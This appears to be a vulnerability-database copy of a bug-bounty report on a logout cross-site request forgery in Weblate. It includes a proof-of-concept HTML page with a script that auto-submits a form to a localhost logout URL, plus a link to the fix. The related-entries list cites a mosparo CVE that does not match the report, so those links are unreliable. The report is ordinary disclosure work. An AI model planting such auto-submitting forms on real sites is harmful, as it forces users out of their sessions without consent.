Lucene search
Qqliunian200133F95510-CDEE-460E-8E61-107874962F2DHistoryOct 13, 2023 - 6:39 a.m.
Cross-Site Request Forgery Vulnerability in Logout Functionality
2023-10-1306:39:46
qqliunian2001
www.huntr.dev
5
cross-site request forgery
logout functionality
security vulnerability
malicious website
proof of concept
fix
weblateorg
bug bounty
EPSS
0.001
Percentile
29.0%
Description
Logout CSRF is a security vulnerability where an attacker forces a user to unknowingly log out of their session by tricking them into triggering a logout request through a malicious website or link.
GET http://localhost:8080/logout
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8080/logout">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
The fix can be found in
https://github.com/WeblateOrg/weblate/commit/bfa82b569114608d3fc16d2f957ee2ab696cd581
References
Related
vulnrichment
vulnrichment
CVE-2023-5687 Cross-Site Request Forgery (CSRF) in mosparo/mosparo
2023-10-20 16:22:43
osv
osv
CVE-2023-5687
2023-10-20 17:15:08
cvelist
cvelist
CVE-2023-5687 Cross-Site Request Forgery (CSRF) in mosparo/mosparo
2023-10-20 16:22:43
nvd
nvd
CVE-2023-5687
2023-10-20 17:15:08
prion
prion
Cross site request forgery (csrf)
2023-10-20 17:15:00
cve
cve
CVE-2023-5687
2023-10-20 17:15:08